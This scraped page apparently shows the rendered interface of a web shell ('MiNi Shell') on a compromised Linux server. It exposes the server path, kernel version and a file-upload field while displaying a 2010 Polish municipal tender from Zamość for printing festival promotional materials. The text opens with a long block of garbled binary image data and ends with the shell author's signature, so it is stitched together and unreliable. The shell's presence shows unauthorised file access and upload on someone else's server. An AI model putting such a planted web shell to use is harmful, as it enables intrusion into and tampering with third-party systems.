JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100415/106654-N-2010.html

<p class="kh_header"><b>Zamość: Duk i skład materiałów promocyjnych projektu -Zamość - letni salon sztuki Lubelszczyzny-współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013</b><br>
<b>Numer ogłoszenia: 106654 - 2010; data zamieszczenia: 15.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Duk i skład materiałów promocyjnych projektu -Zamość - letni salon sztuki Lubelszczyzny-współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu nieograniczonego jest druk i skład materiałów promocyjnych projektu -Zamość - letni salon sztuki Lubelszczyzny- współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 według poniżej specyfikacji usług.

Druk i skład materiałów promocyjnych dotyczy wydarzeń artystycznych realizowanych                  w ramach projektu:

Festiwal Kultury Włoskiej ARTE, CULTURA, MUSICA E

1. Koncert muzyki poważnej i rozrywkowej prezentujący dorobek polskiej i włoskiej piosenki z udziałem amatorskich grup tanecznych, chórów i utalentowanych młodych artystów

a) bezpłatne bilety festiwalowe:
-ilość sztuk 3000,
-dane techniczne: CMYK, format 6 x 9, papier kreda 200 g błyszczący dwustronnie foliowany.

b) afisze i plakaty:
-ilość sztuk 400,
-dane techniczne: format A1 jednostronny, papier kreda błyszczący 150 g, CMYK.

c) programy festiwalowe:
-ilość sztuk 500,
-dane techniczne: CMYK, format B3, składany 4 strony, papier kreda błyszczący 200g, dwustronnie foliowany.

d) zaproszenia festiwalowe:
-ilość sztuk 200,
-dane techniczne: CMYK, format B3, 4 strony, papier kreda błyszczący 200 g.

						Termin wykonania: do 17 maja 2010 r.






2. Konferencja poświęcona historii sztuki włoskiej i jej związkom ze sztuką polską oraz towarzyszące jej wystawy

a) katalog wystawy:
-ilość sztuk 500,
-dane techniczne: Format B5, ok. 200 stron, 200 ilustracji pełny kolor, papier kreda matowa 140 gr., oprawa szyta, składkowa, okładka 4x4, oprawa twarda, foliowana. Koszt druku zawiera skład, opracowanie graficzne i redakcyjne.

						Termin wykonania: do 31 sierpnia 2010 r.

b) materiały konferencyjne:
-ilość sztuk 500,
-dane techniczne: Format B5, ok. 200 stron, 50 ilustracji pełny kolor, papier offsetowy 120 gr., oprawa szyta, składkowa, okładka 4x0, oprawa twarda, foliowana. Koszt druku zawiera skład, opracowanie graficzne i redakcyjne. 

						Termin wykonania: do 31 sierpnia 2010 r.

c) afisze:
-ilość sztuk 200,
-dane techniczne: format A2, 2x0.

d) plakaty:
-ilość sztuk: 200,
-dane techniczne: format A2, 4x0. 

e) zaproszenia wraz z programem konferencji:
-ilość sztuk 500,
-dane techniczne: format A4, druk dwustronny, pełny kolor, papier karton, folia matowa jednostronnie biga.

					    Termin wykonania pkt C - E: do 31 maja 2010 r.


3. Seminarium popularnonaukowe poświęcone literaturze włoskiej

a) wydawnictwo Literatura włoska na tle literatury europejskiej i światowej:
-ilość sztuk: 300,
-dane techniczne: format 231 x 162 mm, 60 stron, papier kreda 100 g na m2, druk czarny,
-okładka miękka matowa, papier 300 g na m2, pełny kolor, oprawa klejona.

						   Termin wykonania do 31 maja 2010 r.









b) folder:
-ilość: 300,
-dane techniczne: format A4 złożony na 3 części, po złożeniu format 99 x 210 mm, druk dwustronnie kolorowy, papier kredowy 200g na m2.

c) plakat:
-ilość 30,
-dane techniczne: format B2, papier kredowy 150g na m2, kolor na całości.

d) zaproszenie:
-ilość: 400,
-dane techniczne: zaproszenie składane na 2 części, po złożeniu format A5, druk dwustronnie kolorowy, papier karton o gramaturze 230g na m2.

						Termin wykonania: do 24 maja 2010 r.


Zamojskie Lato Teatralne

1. Maska Teatralna - konkurs plastyczny dla dzieci i młodzieży oraz wystawa pokonkursowa

a) folder:
-ilość sztuk 100,
-dane techniczne: składanka kolorowa, 8 stron, format A5, papier kreda gramatura 250

b) plakaty:
-ilość sztuk 50,
-dane techniczne: format A2, papier kreda gramatura 130 - 150.

c) baner reklamowy: 
- ilość sztuk 1,
- dane techniczne: 545 x 100 cm, rama drewniana z płótnem.

						      Termin wykonania: do 10 czerwca 2010 r.


2. Warsztaty teatralne i dramaturgiczne, konkurs na sztukę teatralną -Szukamy polskiego Szekspira -, przegląd teatrów amatorskich, Zamojskie Spotkania Wokalne, przegląd teatrów studenckich, wystawa fotografii teatralnej

a) plakaty i afisze:
-ilość sztuk 800,
-dane techniczne: pełny kolor, format B2, papier 150 g.

b) ulotki:
-ilość sztuk 3000,
-dane techniczne: pełny kolor, dwustronne, format A5, papier 120 g.

c) zaproszenia:
-ilość sztuk 100,
-dane techniczne: pełny kolor, format A4, papier 250 g.

d) foldery programowe:
-ilość sztuk: 500,
-dane techniczne: pełny kolor, 24 strony, format A4, papier 250 g. plus okładka o formacie A4, lakier wybiórczy, papier 300 g.



e) baner:
-ilość sztuk 3
-dane techniczne: 120 x 1000 cm, z oczkowaniem.


f) baner:
-ilość sztuk 2,
-dane techniczne: 120 x 700 cm, z oczkowaniem

						Termin wykonania: do 31 maja 2010 r.


Zamojski Festiwal Kultury im. Marka Grechuty

1. Świat poezji śpiewanej Marka Grechuty - konkurs dla dzieci i młodzieży oraz wystawa pokonkursowa

a) folder:
-ilość sztuk 100,
-dane techniczne: składanka kolorowa, 8 stron, format A5, papier kreda gramatura 250

b) plakaty:
- ilość sztuk 50,
- dane techniczne: format A2, papier kreda gramatura 130 - 150.

c) baner reklamowy:
-ilość sztuk 1,
-dane techniczne: 545 x 100 cm, rama drewniana z płótnem.

						Termin wykonania: do 13 sierpnia 2010 r.

2. Ogólnopolski konkurs wokalistów im. Marka Grechuty skierowany do utalentowanych młodych adeptów piosenki aktorskiej i poetyckiej, w tym studentów szkół aktorskich. Ich umiejętności oceniane będą przez znawców muzyki, krytyków oraz dyrektora Orkiestry Symfonicznej im. Karola Namysłowskiego

a) afisze:
-ilość sztuk 200,
- dane techniczne: format A1 jednostronny, papier kreda błyszczący 150 g, CMYK.





b) programy konkursowe: 
-ilość sztuk 300,
-dane techniczne: CMYK, format A5, 4 strony, papier kreda błyszczący 200 g jednostronnie foliowany.

						Termin wykonania: do 17 maja 2010 r.



3. Koncert w hołdzie Markowi Grechucie z udziałem laureatów Konkursu Wokalistów oraz chórów młodzieżowych i studenckich. Rejestracja koncertu - zadanie w ramach Zamojskiego Festiwalu Kultury im. Marka Grechuty

a) afisze i plakaty festiwalowe:
-ilość sztuk 400,
-dane techniczne: CMYK, format A1 jednostronny, papier kreda błyszczący 150 g.


b) programy festiwalowe:
-ilość sztuk 500,
-dane techniczne: CMYK, format A5, 4 strony, papier kreda błyszczący 200 g dwustronnie foliowany. 

c) zaproszenia festiwalowe:
-ilość sztuk 200,
-dane techniczne: CMYK, format A5, 4 strony, papier kreda błyszczący 200 g.

d) bezpłatne bilety festiwalowe:
-ilość sztuk: 3000,
-dane techniczne: CMYK, format 6 x 9, papier kreda błyszczący 200 g. dwustronnie foliowany.
						          Termin wykonania: do 30 lipca 2010 r.

Materiały promujące projekt

a) tablica informacyjna:
-ilość sztuk 2,
-dane techniczne: wymiary minimum 70 x 90 cm,
-tablice zawierać będą 3 kolorowe logotypy na białym tle: Narodowej Strategii Spójności (dla Programu Regionalnego), Województwa Lubelskiego oraz Europejskiego Funduszu Rozwoju Regionalnego, hasło, nazwę projektu, opis przedsięwzięcia w treści i według wzoru przekazanych przez Zamawiającego.

b) naklejka  plakietka informacyjna:
-ilość 400,
-dane techniczne: wymiary minimum 2 x 9,5 cm zawierające 3 kolorowe logotypy na białym tle: Narodowej Strategii Spójności (dla Programu Regionalnego), Województwa Lubelskiego oraz Europejskiego Funduszu Rozwoju Regionalnego. 


							Termin wykonania: do 28 maja 2010 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty (wg wzoru zał. nr 1) w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną
2) Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie  z art. 23 ustawy Prawo zamówień publicznych. Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika - w formie oryginału lub kopii poświadczonej notarialnie.
3) Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej) - w formie oryginału lub kopii poświadczonej notarialnie.
4) Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go  z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w sytuacji, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy                  i może dotyczyć m.in. ilości drukowanych materiałów promocyjnych, zmiany parametrów technicznych druku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (materiały przetargowe) można także uzyskać nieodpłatnie w siedzibie Zamawiającego: Urząd Miasta Zamość ul. Rynek Wielki 13, 22-400 Zamość,                      pokój  nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 10:00, miejsce: Urzędzie Miasta Zamość,22-400 Zamość, Rynek Wielki 13 (Ratusz) pokoju nr 7 (sekretariat Prezydenta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Otwarcie ofert nastąpi w dniu 23 kwietnia 2010r. o godz. 10.30 w siedzibie Zamawiającego - Urząd Miasta Zamość, Rynek Wielki 13, 22-400 Zamość w pokoju nr 12 (Ratusz).
2.Osoby uprawnione do kontaktów z Wykonawcami są: Marta Trych, Małgorzata Strzępek fax (84) 639-30-54, e-mail: zamowienia@zamosc.um.gov.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com